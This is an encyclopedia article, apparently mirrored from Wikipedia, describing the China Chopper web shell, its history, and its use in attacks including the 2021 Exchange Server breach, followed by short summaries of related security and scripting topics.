China Chopper

Last updated

China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. This web shell has two parts, the client interface (an executable file) and the receiver host file on the compromised web server.

China Chopper has many commands and control features such as a password brute-force attack option, code obfuscation, file and database management and a graphical user interface. [1] [2] [3] [4] It originally was distributed from a website www.maicaidao.com which is now down. FireEye revealed that the client of this web shell is programmed in Microsoft Visual C++ 6.0

China Chopper was used in attacks against eight Australian web hosting providers which were compromised due to their use of an unsupported operating system (Windows Server 2008). Hackers connected the web servers to a Monero mining pool, by which they mined about 3868 AUD worth of Monero. [5]

In 2021, a version of the web shell programmed in JScript was used by Advanced Persistent Threat group Hafnium to exploit four zero-day vulnerabilities in Microsoft Exchange Server, in the 2021 Microsoft Exchange Server data breach. This web shell was dropped when one of these vulnerabilities was exploited, allowing attackers to upload a program which ran with administrator privileges. [6] With only the address of the .aspx file containing the script, a HTTP POST request could be made to the script with just a command in the request, causing the script to execute the command immediately using the JScript 'eval' function, allowing attackers to run arbitrary code on the server. [7]

Related Research Articles

VBScript is an Active Scripting language developed by Microsoft that is modeled on Visual Basic. It allows Microsoft Windows system administrators to generate powerful tools for managing computers without error handling and with subroutines and other advanced programming constructs. It can give the user complete control over many aspects of their computing environment.

<span class="mw-page-title-main">Windows Script Host</span> Automation Technology for Windows

The Microsoft Windows Script Host (WSH) is an automation technology for Microsoft Windows operating systems that provides scripting abilities comparable to batch files, but with a wider range of supported features. This tool was first provided on Windows 95 after Build 950a on the installation discs as an optional installation configurable and installable by means of the Control Panel, and then a standard component of Windows 98 and subsequent and Windows NT 4.0 Build 1381 and by means of Service Pack 4. The WSH is also a means of automation for Internet Explorer via the installed WSH engines from IE Version 3.0 onwards; at this time VBScript became means of automation for Microsoft Outlook 97. The WSH is also an optional install provided with a VBScript and JScript engine for Windows CE 3.0 and following and some third-party engines including Rexx and other forms of Basic are also available.

<span class="mw-page-title-main">ESET</span> Slovak internet security company

ESET, s.r.o., is a Slovak software company specializing in cybersecurity. ESET's security products are made in Europe and provide security software in over 200 countries and territories worldwide, and its software is localized into more than 30 languages.

In computing, Download.ject is a malware program for Microsoft Windows servers. When installed on an insecure website running on Microsoft Internet Information Services (IIS), it appends malicious JavaScript to all pages served by the site.

JScript .NET is a .NET programming language developed by Microsoft.

Active Scripting is the technology used in Windows to implement component-based scripting support. It is based on OLE Automation and allows installation of additional scripting engines in the form of COM modules.

Microsoft Script Debugger is relatively minimal debugger for Windows Script Host-supported scripting languages, such as VBScript and JScript. Its user interface allows the user to set breakpoints and/or step through execution of script code line by line, and examine values of variables and properties after any step. In effect, it provides a way for developers to see script code behavior as it runs, thus eliminating much of the guess-work when things do not quite work as intended.

In Microsoft Windows applications programming, OLE Automation is an inter-process communication mechanism created by Microsoft. It is based on a subset of Component Object Model (COM) that was intended for use by scripting languages – originally Visual Basic – but now is used by several languages on Windows. All automation objects are required to implement the IDispatch interface. It provides an infrastructure whereby applications called automation controllers can access and manipulate shared automation objects that are exported by other applications. It supersedes Dynamic Data Exchange (DDE), an older mechanism for applications to control one another. As with DDE, in OLE Automation the automation controller is the "client" and the application exporting the automation objects is the "server".

A home server is a computing server located in a private computing residence providing services to other devices inside or outside the household through a home network or the Internet. Such services may include file and printer serving, media center serving, home automation control, web serving, web caching, file sharing and synchronization, video surveillance and digital video recorder, calendar and contact sharing and synchronization, account authentication, and backup services.

<span class="mw-page-title-main">PowerShell</span> Cross-platform command-line interface and scripting language for system and network administration

PowerShell is a task automation and configuration management program from Microsoft, consisting of a command-line shell and the associated scripting language. Initially a Windows component only, known as Windows PowerShell, it was made open-source and cross-platform on 18 August 2016 with the introduction of PowerShell Core. The former is built on the .NET Framework, the latter on .NET.

A batch file is a script file in DOS, OS/2 and Microsoft Windows. It consists of a series of commands to be executed by the command-line interpreter, stored in a plain text file. A batch file may contain any command the interpreter accepts interactively and use constructs that enable conditional branching and looping within the batch file, such as IF, FOR, and GOTO labels. The term "batch" is from batch processing, meaning "non-interactive execution", though a batch file might not process a batch of multiple data.

A supply chain attack is a cyber-attack that seeks to damage an organization by targeting less secure elements in the supply chain. A supply chain attack can occur in any industry, from the financial sector, oil industry, to a government sector. A supply chain attack can happen in software or hardware. Cybercriminals typically tamper with the manufacturing or distribution of a product by installing malware or hardware-based spying components. Symantec's 2019 Internet Security Threat Report states that supply chain attacks increased by 78 percent in 2018.

<span class="mw-page-title-main">Server Core</span> Windows Server installation option

Server Core is a minimalistic Microsoft Windows Server installation option, debuted in Windows Server 2008. Server Core provides a server environment with functionality scaled back to core server features, and because of limited features, it has reduced servicing and management requirements, attack surface, disk and memory usage. Andrew Mason, a program manager on the Windows Server team, noted that a primary motivation for producing a Server Core variant of Windows Server 2008 was to reduce the attack surface of the operating system, and that about 70% of the security vulnerabilities in Microsoft Windows from the prior five years would not have affected Server Core. Most notably, no Windows Explorer shell is installed. All configuration and maintenance is done entirely through command-line interface windows, or by connecting to the machine remotely using Microsoft Management Console (MMC), remote server administration tools, and PowerShell.

<span class="mw-page-title-main">Shellshock (software bug)</span> Security bug in the Unix Bash shell discovered in 2014

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

The Zealot Campaign is a cryptocurrency mining malware collected from a series of stolen National Security Agency (NSA) exploits, released by the Shadow Brokers group on both Windows and Linux machines to mine cryptocurrency, specifically Monero. Discovered in December 2017, these exploits appeared in the Zealot suite include EternalBlue, EternalSynergy, and Apache Struts Jakarta Multipart Parser attack exploit, or CVE-2017-5638. The other notable exploit within the Zealot vulnerabilities includes vulnerability CVE-2017-9822, known as DotNetNuke (DNN) which exploits a content management system so that the user can install a Monero miner software. An estimated USD $8,500 of Monero having been mined on a single targeted computer. The campaign was discovered and studied extensively by F5 Networks in December 2017.

<span class="mw-page-title-main">Web shell</span> Interface enabling remote access to a web server

A web shell is a shell-like interface that enables a web server to be remotely accessed, often for the purposes of cyberattacks. A web shell is unique in that a web browser is used to interact with it.

WinRM (Windows Remote Management) is Microsoft's implementation of WS-Management in Windows which allows systems to access or exchange management information across a common network. Utilizing scripting objects or the built-in command-line tool, WinRM can be used with any remote computers that may have baseboard management controllers (BMCs) to acquire data. On Windows-based computers including WinRM, certain data supplied by Windows Management Instrumentation (WMI) can also be obtained.

A global wave of cyberattacks and data breaches began in January 2021 after four zero-day exploits were discovered in on-premises Microsoft Exchange Servers, giving attackers full access to user emails and passwords on affected servers, administrator privileges on the server, and access to connected devices on the same network. Attackers typically install a backdoor that allows the attacker full access to impacted servers even if the server is later updated to no longer be vulnerable to the original exploits. As of 9 March 2021, it was estimated that 250,000 servers fell victim to the attacks, including servers belonging to around 30,000 organizations in the United States, 7,000 servers in the United Kingdom, as well as the European Banking Authority, the Norwegian Parliament, and Chile's Commission for the Financial Market (CMF).

Hafnium is a cyber espionage group, sometimes known as an advanced persistent threat, with alleged ties to the Chinese government. Hafnium is closely connected to APT40.

LightBasin, also called UNC1945 by Mandiant, is a suspected Chinese cyber espionage group, that has been described as an advanced persistent threat that has been attributed to multiple cyberattacks on telecommunications companies. As an advanced persistent threat, they seek to gain unauthorized access to a computer network and remain undetected for an extended period. They have been attributed to attacks targeting Linux and Solaris systems.

References

  1. "China Chopper". NJCCIC. Archived from the original on 13 January 2019. Retrieved 22 December 2018.
  2. "What is the China Chopper Webshell, and how to find it on a compromised system?". 28 March 2018. Archived from the original on 13 January 2019. Retrieved 22 December 2018.
  3. "Breaking Down the China Chopper Web Shell - Part I « Breaking Down the China Chopper Web Shell - Part I". Mandiant. Archived from the original on 13 January 2019. Retrieved 2022-01-03.
  4. "Breaking Down the China Chopper Web Shell - Part II « Breaking Down the China Chopper Web Shell - Part II". Mandiant. Archived from the original on 7 January 2019. Retrieved 2022-01-03.
  5. Stilgherrian. "Australian web hosts hit with a Manic Menagerie of malware". ZDNet. Archived from the original on 2019-01-31. Retrieved 2019-03-17.
  6. "ProxyLogon". ProxyLogon (in Chinese (Taiwan)). Retrieved 2021-03-16.
  7. "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix". threatpost.com. Retrieved 2021-03-16.
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.